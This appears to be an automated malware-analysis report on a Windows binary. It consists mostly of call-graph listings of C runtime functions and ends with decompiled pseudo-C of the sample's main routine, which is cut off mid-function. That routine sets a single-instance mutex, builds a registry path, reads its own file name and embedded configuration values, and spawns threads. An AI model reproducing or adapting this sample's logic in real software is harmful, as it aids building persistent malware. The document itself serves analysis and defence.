1311cb8 __wsopen_s 23389->23384 23391 1311cdb 23390->23391 23392 1311cee 23390->23392 23393 1313cd1 __dosmaperr 20 API calls 23391->23393 23394 1311d41 23392->23394 23395 1311d00 23392->23395 23396 1311ce0 23393->23396 23398 1313cd1 __dosmaperr 20 API calls 23394->23398 23411 1311b7d 23395->23411 23397 13110b9 __cftof 26 API calls 23396->23397 23402 1311ca4 23397->23402 23400 1311d46 23398->23400 23401 13110b9 __cftof 26 API calls 23400->23401 23401->23402 23408 1311cc3 23402->23408 23404 1313aef ___std_exception_copy 26 API calls 23405 1311d5c 23404->23405 23405->23402 23406 13110e6 __cftof 11 API calls 23405->23406 23407 1311d73 23406->23407 23491 131689e LeaveCriticalSection 23408->23491 23410 1311cca 23410->23388 23413 1311b8a 23411->23413 23412 1311bde 23412->23402 23412->23404 23413->23412 23415 1316722 23413->23415 23416 1316736 23415->23416 23422 1316730 23415->23422 23432 131674b 23416->23432 23419 131df33 23452 131df50 23419->23452 23421 131def8 23425 1313cd1 __dosmaperr 20 API calls 23421->23425 23422->23419 23422->23421 23423 131df15 23422->23423 23423->23419 23426 131df1f 23423->23426 23424 131df08 23424->23413 23427 131defd 23425->23427 23428 1313cd1 __dosmaperr 20 API calls 23426->23428 23429 13110b9 __cftof 26 API calls 23427->23429 23430 131df24 23428->23430 23429->23424 23431 13110b9 __cftof 26 API calls 23430->23431 23431->23424 23433 130e1a2 __fassign 38 API calls 23432->23433 23434 1316761 23433->23434 23435 1316746 23434->23435 23436 131677d 23434->23436 23437 1316794 23434->23437 23435->23413 23438 1313cd1 __dosmaperr 20 API calls 23436->23438 23439 131679d 23437->23439 23440 13167af 23437->23440 23441 1316782 23438->23441 23442 1313cd1 __dosmaperr 20 API calls 23439->23442 23443 13167bc 23440->23443 23444 13167cf 23440->23444 23445 13110b9 __cftof 26 API calls 23441->23445 23446 13167a2 23442->23446 23447 131df50 46 API calls 23443->23447 23463 131e2af 23444->23463 23445->23435 23449 13110b9 __cftof 26 API calls 23446->23449 23447->23435 23449->23435 23451 1313cd1 __dosmaperr 20 API calls 23451->23435 23453 131df9a ___ascii_strnicmp 23452->23453 23454 131df62 23452->23454 23453->23424 23455 130e1a2 __fassign 38 API calls 23454->23455 23456 131df70 23455->23456 23457 131df8a 23456->23457 23462 131df9c 23456->23462 23458 1313cd1 __dosmaperr 20 API calls 23457->23458 23459 131df8f 23458->23459 23460 13110b9 __cftof 26 API calls 23459->23460 23460->23453 23461 130e2bc 46 API calls 23461->23462 23462->23453 23462->23461 23464 130e1a2 __fassign 38 API calls 23463->23464 23465 131e2c2 23464->23465 23468 131e007 23465->23468 23472 131e03b 23468->23472 23469 130a07b _ValidateLocalCookies 5 API calls 23470 13167e5 23469->23470 23470->23435 23470->23451 23471 131e129 MultiByteToWideChar 23473 131e147 23471->23473 23479 131e062 23471->23479 23472->23471 23474 131e0ae GetCPInfo 23472->23474 23472->23479 23476 13151cd _strftime 21 API calls 23473->23476 23480 131e168 _strftime 23473->23480 23475 131e0bd 23474->23475 23474->23479 23475->23471 23475->23479 23476->23480 23477 131e1bb MultiByteToWideChar 23478 131e28c 23477->23478 23481 131e1d7 MultiByteToWideChar 23477->23481 23482 131407d __freea 20 API calls 23478->23482 23479->23469 23480->23477 23480->23478 23481->23478 23483 131e1f1 23481->23483 23482->23479 23484 13151cd _strftime 21 API calls 23483->23484 23487 131e212 _strftime 23483->23487 23484->23487 23485 131e27f 23489 131407d __freea 20 API calls 23485->23489 23486 131e24f MultiByteToWideChar 23486->23485 23488 131e266 23486->23488 23487->23485 23487->23486 23490 13147ce 11 API calls 23488->23490 23489->23478 23490->23485 23491->23410 19012 1309cf8 19017 130a026 SetUnhandledExceptionFilter 19012->19017 19014 1309cfd pre_c_initialization 19018 1313973 19014->19018 19016 1309d08 19017->19014 19019 1313999 19018->19019 19020 131397f 19018->19020 19019->19016 19020->19019 19021 1313cd1 __dosmaperr 20 API calls 19020->19021 19022 1313989 19021->19022 19025 13110b9 19022->19025 19026 131103e __cftof 26 API calls 19025->19026 19027 13110c5 19026->19027 19027->19016 24786 13142fa 24787 1314305 24786->24787 24788 1314315 24786->24788 24792 131431b 24787->24792 24791 1314615 _free 20 API calls 24791->24788 24793 1314334 24792->24793 24794 131432e 24792->24794 24796 1314615 _free 20 API calls 24793->24796 24795 1314615 _free 20 API calls 24794->24795 24795->24793 24797 1314340 24796->24797 24798 1314615 _free 20 API calls 24797->24798 24799 131434b 24798->24799 24800 1314615 _free 20 API calls 24799->24800 24801 1314356 24800->24801 24802 1314615 _free 20 API calls 24801->24802 24803 1314361 24802->24803 24804 1314615 _free 20 API calls 24803->24804 24805 131436c 24804->24805 24806 1314615 _free 20 API calls 24805->24806 24807 1314377 24806->24807 24808 1314615 _free 20 API calls 24807->24808 24809 1314382 24808->24809 24810 1314615 _free 20 API calls 24809->24810 24811 131438d 24810->24811 24812 1314615 _free 20 API calls 24811->24812 24813 131439b 24812->24813 24818 13141e1 24813->24818 24824 13140ed 24818->24824 24820 1314205 24821 1314231 24820->24821 24837 131414e 24821->24837 24823 1314255 24823->24791 24825 13140f9 CallCatchBlock 24824->24825 24832 1316856 EnterCriticalSection 24825->24832 24827 131412d 24833 1314142 24827->24833 24829 1314103 24829->24827 24831 1314615 _free 20 API calls 24829->24831 24830 131413a __wsopen_s 24830->24820 24831->24827 24832->24829 24836 131689e LeaveCriticalSection 24833->24836 24835 131414c 24835->24830 24836->24835 24838 131415a CallCatchBlock 24837->24838 24845 1316856 EnterCriticalSection 24838->24845 24840 1314164 24841 13143c4 __dosmaperr 20 API calls 24840->24841 24842 1314177 24841->24842 24846 131418d 24842->24846 24844 1314185 __wsopen_s 24844->24823 24845->24840 24849 131689e LeaveCriticalSection 24846->24849 24848 1314197 24848->24844 24849->24848 22971 1311afd 22973 1311b09 _strftime CallCatchBlock 22971->22973 22972 1311b17 22974 1313cd1 __dosmaperr 20 API calls 22972->22974 22973->22972 22976 1311b41 22973->22976 22975 1311b1c 22974->22975 22977 13110b9 __cftof 26 API calls 22975->22977 22984 1316856 EnterCriticalSection 22976->22984 22982 1311b27 __wsopen_s 22977->22982 22979 1311b4c 22985 1311bed 22979->22985 22984->22979 22987 1311bfb 22985->22987 22986 1311b57 22989 1311b74 22986->22989 22987->22986 22992 1316525 22987->22992 23043 131689e LeaveCriticalSection 22989->23043 22991 1311b7b 22991->22982 22993 131653a 22992->22993 22994 13165dc 22992->22994 22996 1316541 22993->22996 22997 1316562 22993->22997 23005 13165f5 22994->23005 22998 1313cd1 __dosmaperr 20 API calls 22996->22998 23001 1313cd1 __dosmaperr 20 API calls 22997->23001 23004 1316551 22997->23004 22999 1316546 22998->22999 23000 13110b9 __cftof 26 API calls 22999->23000 23000->23004 23002 1316573 23001->23002 23003 13110b9 __cftof 26 API calls 23002->23003 23003->23004 23004->22987 23006 131660c 23005->23006 23027 1316605 23005->23027 23007 1316612 23006->23007 23008 131662c 23006->23008 23009 1313cd1 __dosmaperr 20 API calls 23007->23009 23010 1316634 23008->23010 23011 131664e 23008->23011 23012 1316617 23009->23012 23013 1313cd1 __dosmaperr 20 API calls 23010->23013 23014 1316658 23011->23014 23015 131666d 23011->23015 23017 13110b9 __cftof 26 API calls 23012->23017 23018 1316639 23013->23018 23019 1313cd1 __dosmaperr 20 API calls 23014->23019 23016 130e1a2 __fassign 38 API calls 23015->23016 23020 1316678 23016->23020 23017->23027 23021 13110b9 __cftof 26 API calls 23018->23021 23022 131665d 23019->23022 23020->23027 23028 131de7c 23020->23028 23021->23027 23023 13110b9 __cftof 26 API calls 23022->23023 23023->23027 23026 1313cd1 __dosmaperr 20 API calls 23026->23027 23027->23004 23029 131de89 _strftime 23028->23029 23030 13166f2 23029->23030 23032 13147ce 23029->23032 23030->23026 23030->23027 23040 131464f 23032->23040 23035 1314bcf _strftime 10 API calls 23036 131482a CompareStringW 23035->23036 23037 13147ea 23036->23037 23038 130a07b _ValidateLocalCookies 5 API calls 23037->23038 23039 131483c 23038->23039 23039->23030 23041 1314669 __dosmaperr 5 API calls 23040->23041 23042 1314665 23041->23042 23042->23035 23042->23037 23043->22991 23147 131a17e 23150 131a1a4 23147->23150 23151 131a1a0 23147->23151 23148 130a07b _ValidateLocalCookies 5 API calls 23149 131a206 23148->23149 23150->23151 23152 13150e6 31 API calls 23150->23152 23151->23148 23152->23150 22882 13096da 22893 130971e InitializeCriticalSectionAndSpinCount GetModuleHandleW 22882->22893 22884 13096df 22904 1309a46 22884->22904 22886 13096e6 22887 13096f9 22886->22887 22888 13096eb 22886->22888 22890 1309e90 ___scrt_fastfail 4 API calls 22887->22890 22889 1309bff pre_c_initialization 29 API calls 22888->22889 22891 13096f5 22889->22891 22892 1309700 22890->22892 22894 1309764 GetModuleHandleW 22893->22894 22895 1309779 GetProcAddress GetProcAddress GetProcAddress 22893->22895 22894->22895 22896 1309805 22894->22896 22897 13097a7 22895->22897 22898 13097df CreateEventW 22895->22898 22899 1309e90 ___scrt_fastfail 4 API calls 22896->22899 22897->22898 22903 13097af __crt_fast_encode_pointer 22897->22903 22898->22896 22898->22903 22900 130980c DeleteCriticalSection 22899->22900 22901 1309821 CloseHandle 22900->22901 22902 1309828 22900->22902 22901->22902 22902->22884 22903->22884 22905 1309a55 22904->22905 22906 1309a59 22904->22906 22905->22886 22907 1309e90 ___scrt_fastfail 4 API calls 22906->22907 22909 1309a66 pre_c_initialization ___scrt_release_startup_lock 22906->22909 22908 1309aea 22907->22908 22909->22886 22910 1312c5a 22911 1312c63 22910->22911 22912 1312c7c 22910->22912 22913 1312c6b 22911->22913 22917 1312ce2 22911->22917 22915 1312c73 22915->22913 22928 1312faf 22915->22928 22918 1312ceb 22917->22918 22919 1312cee 22917->22919 22918->22915 22938 13199fc GetEnvironmentStringsW 22919->22938 22922 1312cfb 22924 1314615 _free 20 API calls 22922->22924 22925 1312d30 22924->22925 22925->22915 22926 1314615 _free 20 API calls 22926->22922 22927 1312d06 22927->22926 22929 1312fbc 22928->22929 22935 1312fc1 22928->22935 22929->22912 22930 1312fc7 MultiByteToWideChar 22930->22935 22936 1313016 22930->22936 22931 13145b8 __dosmaperr 20 API calls 22931->22935 22932 1312feb MultiByteToWideChar 22933 131301c 22932->22933 22932->22935 22934 1314615 _free 20 API calls 22933->22934 22934->22936 22935->22930 22935->22931 22935->22932 22935->22933 22935->22936 22937 1314615 _free 20 API calls 22935->22937 22936->22912 22937->22935 22939 1319a10 22938->22939 22940 1312cf5 22938->22940 22941 13151cd _strftime 21 API calls 22939->22941 22940->22922 22945 1312e07 22940->22945 22942 1319a24 22941->22942 22943 1314615 _free 20 API calls 22942->22943 22944 1319a3e FreeEnvironmentStringsW 22943->22944 22944->22940 22948 1312e25 22945->22948 22946 13145b8 __dosmaperr 20 API calls 22955 1312e5f 22946->22955 22947 1312ed0 22949 1314615 _free 20 API calls 22947->22949 22948->22946 22950 1312eea 22949->22950 22950->22927 22951 13145b8 __dosmaperr 20 API calls 22951->22955 22952 1312ed2 22953 1312f01 20 API calls 22952->22953 22956 1312ed8 22953->22956 22955->22947 22955->22951 22955->22952 22957 1312ef4 22955->22957 22960 1314615 _free 20 API calls 22955->22960 22962 13164c1 22955->22962 22958 1314615 _free 20 API calls 22956->22958 22959 13110e6 __cftof 11 API calls 22957->22959 22958->22947 22961 1312f00 22959->22961 22960->22955 22963 13164dc 22962->22963 22964 13164ce 22962->22964 22965 1313cd1 __dosmaperr 20 API calls 22963->22965 22964->22963 22969 13164f5 22964->22969 22966 13164e6 22965->22966 22967 13110b9 __cftof 26 API calls 22966->22967 22968 13164f0 22967->22968 22968->22955 22969->22968 22970 1313cd1 __dosmaperr 20 API calls 22969->22970 22970->22966 18755 13037c5 18756 13011fb 18755->18756 18757 1303d9f 18755->18757 18758 13037d9 18756->18758 18769 1309967 18756->18769 18779 13011fb 18757->18779 18762 1303dc1 18782 131103e 18762->18782 18763 1303db7 18766 13110d8 18793 13110e6 IsProcessorFeaturePresent 18766->18793 18768 13110e5 18772 130996c 18769->18772 18771 1301201 18772->18771 18775 1309988 18772->18775 18797 1311119 18772->18797 18804 131245e 18772->18804 18774 130a0db 18776 130c79f __CxxThrowException@8 RaiseException 18774->18776 18775->18774 18809 130c79f 18775->18809 18778 130a0f8 18776->18778 18780 1309967 22 API calls 18779->18780 18781 1301201 18780->18781 18781->18762 18781->18763 18783 1314493 __dosmaperr 20 API calls 18782->18783 18784 1311054 18783->18784 18785 13110b3 18784->18785 18788 1311062 18784->18788 18786 13110e6 __cftof 11 API calls 18785->18786 18787 13110b8 18786->18787 18789 131103e __cftof 26 API calls 18787->18789 18790 130a07b _ValidateLocalCookies 5 API calls 18788->18790 18791 13110c5 18789->18791 18792 1311089 18790->18792 18791->18766 18792->18766 18794 13110f1 18793->18794 19006 1310eef 18794->19006 18802 13151cd _strftime 18797->18802 18798 131520b 18812 1313cd1 18798->18812 18799 13151f6 RtlAllocateHeap 18801 1315209 18799->18801 18799->18802 18801->18772 18802->18798 18802->18799 18803 131245e _strftime 7 API calls 18802->18803 18803->18802 18995 13124a2 18804->18995 18806 130a07b _ValidateLocalCookies 5 API calls 18807 131249e 18806->18807 18807->18772 18808 1312474 18808->18806 18811 130c7bf RaiseException 18809->18811 18811->18774 18815 1314493 GetLastError 18812->18815 18816 13144b2 18815->18816 18817 13144ac 18815->18817 18821 1314509 SetLastError 18816->18821 18841 13145b8 18816->18841 18834 13148ee 18817->18834 18822 1313cd6 18821->18822 18822->18801 18826 13144d2 18829 1314500 SetLastError 18826->18829 18827 13144cc 18848 1314615 18827->18848 18828 13144e8 18861 1314281 18828->18861 18829->18822 18832 1314615 _free 17 API calls 18833 13144f9 18832->18833 18833->18821 18833->18829 18866 1314669 18834->18866 18836 1314915 18837 131492d TlsGetValue 18836->18837 18838 1314921 18836->18838 18837->18838 18872 130a07b 18838->18872 18840 131493e 18840->18816 18846 13145c5 _strftime 18841->18846 18842 1314605 18845 1313cd1 __dosmaperr 19 API calls 18842->18845 18843 13145f0 RtlAllocateHeap 18844 13144c4 18843->18844 18843->18846 18844->18827 18854 1314944 18844->18854 18845->18844 18846->18842 18846->18843 18847 131245e _strftime 7 API calls 18846->18847 18847->18846 18849 1314620 HeapFree 18848->18849 18850 1314649 __dosmaperr 18848->18850 18849->18850 18851 1314635 18849->18851 18850->18826 18852 1313cd1 __dosmaperr 18 API calls 18851->18852 18853 131463b GetLastError 18852->18853 18853->18850 18855 1314669 __dosmaperr 5 API calls 18854->18855 18856 131496b 18855->18856 18857 1314986 TlsSetValue 18856->18857 18858 131497a 18856->18858 18857->18858 18859 130a07b _ValidateLocalCookies 5 API calls 18858->18859 18860 13144e1 18859->18860 18860->18827 18860->18828 18887 1314259 18861->18887 18869 1314695 18866->18869 18871 1314699 __crt_fast_encode_pointer 18866->18871 18867 13146b9 18870 13146c5 GetProcAddress 18867->18870 18867->18871 18869->18867 18869->18871 18879 1314705 18869->18879 18870->18871 18871->18836 18873 130a084 18872->18873 18874 130a086 IsProcessorFeaturePresent 18872->18874 18873->18840 18876 130a49d 18874->18876 18886 130a461 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18876->18886 18878 130a580 18878->18840 18880 1314726 LoadLibraryExW 18879->18880 18884 131471b 18879->18884 18881 1314743 GetLastError 18880->18881 18882 131475b 18880->18882 18881->18882 18885 131474e LoadLibraryExW 18881->18885 18883 1314772 FreeLibrary 18882->18883 18882->18884 18883->18884 18884->18869 18885->18882 18886->18878 18893 1314199 18887->18893 18889 131427d 18890 1314209 18889->18890 18904 131409d 18890->18904 18892 131422d 18892->18832 18894 13141a5 CallCatchBlock 18893->18894 18899 1316856 EnterCriticalSection 18894->18899 18896 13141af 18900 13141d5 18896->18900 18898 13141cd __wsopen_s 18898->18889 18899->18896 18903 131689e LeaveCriticalSection 18900->18903 18902 13141df 18902->18898 18903->18902 18905 13140a9 CallCatchBlock 18904->18905 18912 1316856 EnterCriticalSection 18905->18912 18907 13140b3 18913 13143c4 18907->18913 18909 13140cb 18917 13140e1 18909->18917 18911 13140d9 __wsopen_s 18911->18892 18912->18907 18914 13143d3 __fassign 18913->18914 18916 13143fa __fassign 18913->18916 18914->18916 18920 131ae1c 18914->18920 18916->18909 18994 131689e LeaveCriticalSection 18917->18994 18919 13140eb 18919->18911 18921 131ae9c 18920->18921 18925 131ae32 18920->18925 18922 131aeea 18921->18922 18924 1314615 _free 20 API calls 18921->18924 18988 131af8f 18922->18988 18926 131aebe 18924->18926 18925->18921 18927 131ae65 18925->18927 18930 1314615 _free 20 API calls 18925->18930 18928 1314615 _free 20 API calls 18926->18928 18929 131ae87 18927->18929 18936 1314615 _free 20 API calls 18927->18936 18931 131aed1 18928->18931 18932 1314615 _free 20 API calls 18929->18932 18934 131ae5a 18930->18934 18935 1314615 _free 20 API calls 18931->18935 18937 131ae91 18932->18937 18933 131af58 18938 1314615 _free 20 API calls 18933->18938 18948 131a9fb 18934->18948 18940 131aedf 18935->18940 18941 131ae7c 18936->18941 18942 1314615 _free 20 API calls 18937->18942 18943 131af5e 18938->18943 18945 1314615 _free 20 API calls 18940->18945 18976 131aaf9 18941->18976 18942->18921 18943->18916 18944 131aef8 18944->18933 18947 1314615 20 API calls _free 18944->18947 18945->18922 18947->18944 18949 131aa0c 18948->18949 18975 131aaf5 18948->18975 18950 131aa1d 18949->18950 18951 1314615 _free 20 API calls 18949->18951 18952 131aa2f 18950->18952 18953 1314615 _free 20 API calls 18950->18953 18951->18950 18954 131aa41 18952->18954 18956 1314615 _free 20 API calls 18952->18956 18953->18952 18955 131aa53 18954->18955 18957 1314615 _free 20 API calls 18954->18957 18958 131aa65 18955->18958 18959 1314615 _free 20 API calls 18955->18959 18956->18954 18957->18955 18960 131aa77 18958->18960 18961 1314615 _free 20 API calls 18958->18961 18959->18958 18962 1314615 _free 20 API calls 18960->18962 18965 131aa89 18960->18965 18961->18960 18962->18965 18963 1314615 _free 20 API calls 18966 131aa9b 18963->18966 18964 131aaad 18968 131aabf 18964->18968 18969 1314615 _free 20 API calls 18964->18969 18965->18963 18965->18966 18966->18964 18967 1314615 _free 20 API calls 18966->18967 18967->18964 18970 131aad1 18968->18970 18972 1314615 _free 20 API calls 18968->18972 18969->18968 18971 131aae3 18970->18971 18973 1314615 _free 20 API calls 18970->18973 18974 1314615 _free 20 API calls 18971->18974 18971->18975 18972->18970 18973->18971 18974->18975 18975->18927 18977 131ab06 18976->18977 18987 131ab5e 18976->18987 18978 131ab16 18977->18978 18979 1314615 _free 20 API calls 18977->18979 18980 131ab28 18978->18980 18981 1314615 _free 20 API calls 18978->18981 18979->18978 18982 1314615 _free 20 API calls 18980->18982 18984 131ab3a 18980->18984 18981->18980 18982->18984 18983 131ab4c 18986 1314615 _free 20 API calls 18983->18986 18983->18987 18984->18983 18985 1314615 _free 20 API calls 18984->18985 18985->18983 18986->18987 18987->18929 18989 131afba 18988->18989 18990 131af9c 18988->18990 18989->18944 18990->18989 18991 131ab9e __fassign 20 API calls 18990->18991 18992 131afb4 18991->18992 18993 1314615 _free 20 API calls 18992->18993 18993->18989 18994->18919 18996 13124ae CallCatchBlock 18995->18996 19001 1316856 EnterCriticalSection 18996->19001 18998 13124b9 19002 13124eb 18998->19002 19000 13124e0 __wsopen_s 19000->18808 19001->18998 19005 131689e LeaveCriticalSection 19002->19005 19004 13124f2 19004->19000 19005->19004 19007 1310f0b ___scrt_fastfail 19006->19007 19008 1310f37 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19007->19008 19011 1311008 ___scrt_fastfail 19008->19011 19009 130a07b _ValidateLocalCookies 5 API calls 19010 1311026 GetCurrentProcess TerminateProcess 19009->19010 19010->18768 19011->19009

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 163 13057e4-130580d call 1306ead call 1307017 call 130603c 170 1305825-1305896 call 130296e * 2 call 13072d8 call 1305eed call 1305ee8 call 1304c09 call 130282e call 13027e1 call 1302712 CreateMutexW GetLastError 163->170 171 130580f-1305822 call 13028af 163->171 192 13058a6-1305982 call 1307c21 call 130275a call 1302755 call 1304c09 call 130282e call 13027e1 call 130326c call 13031ae call 130275a call 1302755 * 3 GetModuleFileNameW call 1302723 call 1304c09 call 130282e call 1304c09 call 130282e call 1304c09 call 130282e 170->192 193 1305898-13058a1 call 1302755 170->193 234 1305988-1305a57 call 1304c09 call 130282e call 1302723 call 1304c09 call 130282e call 1304c09 call 130282e call 1304c09 call 130282e call 1304c09 call 1304c36 call 1304c09 call 130282e call 1302712 call 1304c09 call 130282e call 1304c09 call 130282e call 1304dc5 192->234 235 1305a59-1305a6a call 1305ed4 call 1304c36 192->235 193->171 234->235 244 1305a7b-1305ac7 call 1304c09 call 130296e call 13075d8 call 130282e call 13061d6 call 13028af call 1304c09 call 1304c36 235->244 245 1305a6c-1305a76 call 1305e77 235->245 280 1305bbc-1305bd9 call 1304c09 call 1304c36 244->280 281 1305acd-1305bb5 call 1304c09 call 1304c36 call 1304c09 call 1304c36 call 1304c09 call 130282e call 1304c09 call 130282e call 1304c09 call 1304c36 call 1304c09 call 1304c36 call 1304c09 call 130296e call 1304c09 call 130282e call 1304c09 call 130282e call 1311ad3 call 1304c09 call 130282e call 1304c09 call 130282e call 130127a 244->281 245->244 297 1305c9c-1305cae call 1304c09 call 1304c36 280->297 298 1305bdf-1305c9a call 1309967 call 1305e60 call 1304c09 call 130282e call 1311ad3 call 1304c09 call 130282e call 1311ad3 call 1304c09 call 1304c36 call 1304c09 call 130282e call 1302723 call 1304c09 call 130282e call 1302723 call 1304c09 call 130282e call 1311ad3 call 1304c09 call 1304c36 CreateThread 280->298 490 1305bba 281->490 318 1305d72-1305d8f CreateThread call 1304c09 call 130282e 297->318 319 1305cb4-1305d70 call 1309967 call 1305e60 call 1304c09 call 130282e call 1311ad3 call 1304c09 call 130282e call 1311ad3 call 1304c09 call 1304c36 call 1304c09 call 130282e call 1302723 call 1304c09 call 130282e call 1302723 call 1304c09 call 130282e call 1311ad3 call 1304c09 call 1304c36 CreateThread 297->319 298->297 344 1305d91-1305da2 call 1304c09 call 130282e 318->344 345 1305dd9-1305e5f call 1304c09 call 130282e call 1304c09 call 130282e call 1304c09 call 130282e call 1304c09 call 130282e call 1302917 call 1304c09 call 130282e call 1311ad3 call 1304c09 call 130282e call 1311ad3 call 13042a0 318->345 319->318 344->345 367 1305da4-1305db5 call 1304c09 call 130282e 344->367 367->345 393 1305db7-1305dd3 Sleep call 1302755 call 13028af 367->393 393->345 490->280
                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                      			E013057E4(void* __ebx, void* __edx, void* __edi) {
                                                                                                                                      				char _v40;
                                                                                                                                      				char _v44;
                                                                                                                                      				char _v60;
                                                                                                                                      				char _v68;
                                                                                                                                      				char _v76;
                                                                                                                                      				char _v80;
                                                                                                                                      				char _v92;
                                                                                                                                      				char _v96;
                                                                                                                                      				char _v100;
                                                                                                                                      				char _v104;
                                                                                                                                      				char _v124;
                                                                                                                                      				char _v128;
                                                                                                                                      				char _v132;
                                                                                                                                      				char _v136;
                                                                                                                                      				char _v140;
                                                                                                                                      				char _v141;
                                                                                                                                      				char _v146;
                                                                                                                                      				char _v149;
                                                                                                                                      				char _v150;
                                                                                                                                      				intOrPtr _v164;
                                                                                                                                      				char _v165;
                                                                                                                                      				char _v166;
                                                                                                                                      				char _v181;
                                                                                                                                      				char _v182;
                                                                                                                                      				intOrPtr _v196;
                                                                                                                                      				void* __esi;
                                                                                                                                      				void* _t66;
                                                                                                                                      				void* _t70;
                                                                                                                                      				WCHAR* _t76;
                                                                                                                                      				void* _t79;
                                                                                                                                      				char* _t112;
                                                                                                                                      				intOrPtr* _t121;
                                                                                                                                      				char* _t123;
                                                                                                                                      				void* _t132;
                                                                                                                                      				void* _t144;
                                                                                                                                      				void* _t155;
                                                                                                                                      				void* _t158;
                                                                                                                                      				signed int _t164;
                                                                                                                                      				void* _t167;
                                                                                                                                      				void* _t178;
                                                                                                                                      				void* _t181;
                                                                                                                                      				signed int _t187;
                                                                                                                                      				signed char* _t204;
                                                                                                                                      				signed int _t210;
                                                                                                                                      				void* _t238;
                                                                                                                                      				signed int _t239;
                                                                                                                                      				signed int _t241;
                                                                                                                                      				void* _t247;
                                                                                                                                      				struct _SECURITY_ATTRIBUTES* _t253;
                                                                                                                                      				signed int _t258;
                                                                                                                                      				signed int _t260;
                                                                                                                                      				char _t286;
                                                                                                                                      				char _t305;
                                                                                                                                      				signed int _t356;
                                                                                                                                      				void* _t373;
                                                                                                                                      				void* _t376;
                                                                                                                                      				char _t377;
                                                                                                                                      				intOrPtr* _t380;
                                                                                                                                      				_Unknown_base(*)()* _t383;
                                                                                                                                      				signed int _t386;
                                                                                                                                      				void* _t388;
                                                                                                                                      				void* _t389;
                                                                                                                                      				void* _t390;
                                                                                                                                      				void* _t391;
                                                                                                                                      				void* _t392;
                                                                                                                                      				void* _t393;
                                                                                                                                      
                                                                                                                                      				_t362 = __edx;
                                                                                                                                      				_t382 = _t386;
                                                                                                                                      				_t388 = (_t386 & 0xfffffff8) - 0x88;
                                                                                                                                      				_push(__ebx);
                                                                                                                                      				_push(_t386);
                                                                                                                                      				_push(_t373);
                                                                                                                                      				_push(__edi);
                                                                                                                                      				E01306EAD();
                                                                                                                                      				E01307017( &_v100, __edx);
                                                                                                                                      				_t66 = E0130603C( &_v100);
                                                                                                                                      				_t396 = _t66;
                                                                                                                                      				if(_t66 == 0) {
                                                                                                                                      					_t389 = _t388 - 0x18;
                                                                                                                                      					E0130296E(_t389, __edx, __eflags, 0x132fa74);
                                                                                                                                      					_t390 = _t389 - 0x18;
                                                                                                                                      					E0130296E(_t390, __edx, __eflags,  &_v104);
                                                                                                                                      					_t70 = E013072D8( &_v132, __edx, __eflags);
                                                                                                                                      					_t391 = _t390 + 0x30;
                                                                                                                                      					E01305EED( &_v132, _t362, _t70);
                                                                                                                                      					E01305EE8( &_v136, _t362);
                                                                                                                                      					E013027E1( &_v92, _t362, E0130282E(E01304C09(_t362, _t373, _t382, __eflags, 0x13), __eflags));
                                                                                                                                      					_t76 = E01302712( &_v96, __eflags);
                                                                                                                                      					_t253 = 0;
                                                                                                                                      					CreateMutexW(0, 1, _t76); // executed
                                                                                                                                      					__eflags = GetLastError() - 0xb7;
                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                      						_t79 = E01307C21( &_v124, _t362, __edi, __eflags); // executed
                                                                                                                                      						E0130275A(0x132fa5c, _t362, _t79);
                                                                                                                                      						E01302755( &_v128, _t362, __eflags);
                                                                                                                                      						_t364 = E0130326C( &_v40, L"Software\\", E013027E1( &_v60, _t362, E0130282E(E01304C09(_t362, _t373, _t382, __eflags, 0x13), __eflags)));
                                                                                                                                      						E0130275A(0x132f948, _t85, E013031AE( &_v136, _t85, __edi, 0x1329c08));
                                                                                                                                      						E01302755( &_v140, _t85, __eflags);
                                                                                                                                      						E01302755( &_v44, _t85, __eflags);
                                                                                                                                      						E01302755( &_v68, _t364, __eflags);
                                                                                                                                      						GetModuleFileNameW(0, 0x132f5c0, 0x104);
                                                                                                                                      						E01302723(0x132f900, 0x132f5c0);
                                                                                                                                      						 *0x132f5b4 =  *((char*)(E0130282E(E01304C09(_t364, 0x132f5c0, _t382, __eflags, 0x1d), __eflags)));
                                                                                                                                      						 *0x132f5b8 =  *((char*)(E0130282E(E01304C09(_t364, 0x132f5c0, _t382, __eflags, 0x1e), __eflags)));
                                                                                                                                      						_t286 = E01304C09(_t364, 0x132f5c0, _t382, __eflags, 0x18);
                                                                                                                                      						__eflags =  *((char*)(E0130282E(_t286, __eflags))) - 1;
                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                      							E01302723(0x132f930, E0130282E(E01304C09(_t364, 0x132f5c0, _t382, __eflags, 0x13), __eflags));
                                                                                                                                      							_v146 =  *((intOrPtr*)(E0130282E(E01304C09(_t364, 0x132f5c0, _t382, __eflags, 0x1e), __eflags)));
                                                                                                                                      							_v149 =  *((intOrPtr*)(E0130282E(E01304C09(_t364, 0x132f5c0, _t382, __eflags, 0x1d), __eflags)));
                                                                                                                                      							E0130282E(E01304C09(_t364, 0x132f5c0, _t382, __eflags, 0x20), __eflags);
                                                                                                                                      							_t260 =  *((intOrPtr*)(E01304C36(E01304C09(_t364, 0x132f5c0, _t382, __eflags, 0xd), __eflags, _t232)));
                                                                                                                                      							_t380 = E0130282E(E01304C09(_t364, 0x132f5c0, _t382, __eflags, 0x19), __eflags);
                                                                                                                                      							_t238 = E01302712(0x132f930, __eflags);
                                                                                                                                      							__eflags = _v166;
                                                                                                                                      							_push(_t238);
                                                                                                                                      							__eflags = _v165;
                                                                                                                                      							_t356 = (0x132f900 | _v166 != 0x00000000) & 0x000000ff;
                                                                                                                                      							_push(_t356);
                                                                                                                                      							__eflags = _t260;
                                                                                                                                      							_t239 = (_t356 & 0xffffff00 | _v165 != 0x00000000) & 0x000000ff;
                                                                                                                                      							_push(_t239);
                                                                                                                                      							__eflags = _t260;
                                                                                                                                      							_t241 = (_t239 & 0xffffff00 | _t260 != 0x00000000) & 0x000000ff;
                                                                                                                                      							_push(_t241);
                                                                                                                                      							_push((_t241 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff);
                                                                                                                                      							_push(E0130282E(E01304C09(_t364, _t380, _t382, __eflags, 0x1b), __eflags));
                                                                                                                                      							_t247 = E0130282E(E01304C09(_t364, _t380, _t382, __eflags, 0x1a), __eflags);
                                                                                                                                      							_t286 =  *_t380;
                                                                                                                                      							_t364 = _t247;
                                                                                                                                      							E01304DC5(_t286, _t247, __eflags);
